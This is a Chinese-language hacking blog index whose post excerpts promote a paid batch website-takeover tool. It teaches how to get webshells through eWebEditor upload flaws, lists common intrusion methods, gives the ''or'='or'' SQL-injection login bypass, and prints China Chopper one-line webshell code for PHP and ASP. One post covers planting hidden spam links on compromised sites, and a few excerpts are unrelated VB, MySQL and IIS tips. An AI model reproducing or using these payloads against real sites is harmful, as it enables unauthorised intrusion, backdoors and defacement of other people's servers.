嗨必胜博客

继eWebX1.0测试版...

刚刚录了一半，卡死了。。开太多虚拟了。。

下载地址：eWebX1.2批量拿站教程动画下载

现在已经升级到免费版/百金版，所谓的百金版意思就是 100元整一个/呵呵赚点劳力费吧。对买链接的人来说，绝对超直！

今天做这个教程主要是教大家如何借ewebeditor上传漏洞拿到webshell。

More...

步骤一：
绘制界面新建一个标准EXE工程，将其Caption属性改为“超级记事本”，点击Icon属性给它找个合适的Icon图标。单击菜单“工程”-“部件”，在弹出的“部件”对话框里找到Microsoft RichText Box 6.0和公共对话框Microsoft Common Dialog 6.0并选中它们，单击“确定”按钮。这时左边的工具栏上出现了我们刚才新添的两个控件了。在窗体上绘制RichText Box和Commn Dialog，其中RichText Box的大小和位置可不用理睬，我们将在代码中处理它，当然，有必要把它的ScrollBar属性设为2-rtfVertical，这样在打开和编辑文件时垂直滚动条才可用。

More...

由于W2K3默认上传限制为200KB；上传大于200KB文件就会提示未知错误，这个时候不得不分包上传，让人郁闷极了。

在这里送大家一个超级上传程序。实践可以支持大于20M的文件!

 

More...

　　入侵网站拿webshell常用的五个方法：上传漏洞、暴库、注入漏洞、旁边、COOKIE欺骗。

       1、上传漏洞，这个漏洞在DVBBS6.0时代被们利用的最为猖獗，利用上传漏洞可以直接得到WEBSHELL，危害等级超级高，现在的入侵中上传漏洞也是常见的。

More...

chr码值对应列表大全

More...

另类万能密码
'or'='or' 这个万能密码大家都很熟悉
对于select name,pass from admin where name='admin' and pass='admin'
这样的验证方式是通杀的
但如果验证的时候是先把密码经过md5加密再传递给sql语句像这样
select name,pass from admin where name='admin' and pass=md5('admin')就不行了

More...

阿D常用注入命令收集整理
//看看是什么权限的
//检测是否有读取某数据库的权限

More...

现在简单讲解一下中国菜刀一句话木马如何加黑链.下面这个网址是我已经拿到webshell权力的了；
在这里我就不在讲如何拿webshell了。下次。好了，打开中国菜刀吧。先讲解一下菜刀的一句话。
服务端代码分php,asp,.net：PHP 语言：<?php @eval($_POST['连接密码']);?>ASP 语言：<%eval request("连接密码")%

More...

mysql -u 帐号 -p 密码 数据库名 < c:\sqlfile.sql
导入语句为
C:\Program Files\MySQL\MySQL Server 5.0\bin>mysql -u root -p 123456 heibs< e:\heibs.sql

More...

SQL查询分析器 
在输入窗口里面输入: 
DUMP TRANSACTION [数据库名] WITH NO_LOG 
BACKUP LOG [数据库名] WITH NO_LOG 
DBCC SHRINKDATABASE([数据库名])

More...

虽然 LAMP 组合很不错，但是如果想要架设一台同时支持 PHP、ASP、ASP.NET、JSP、Perl 的 Web 虚拟主机服务器，还是用 Windows 2003 的 IIS 6 最好。网上有很多介绍在 IIS 6 上配置 PHP&n

More...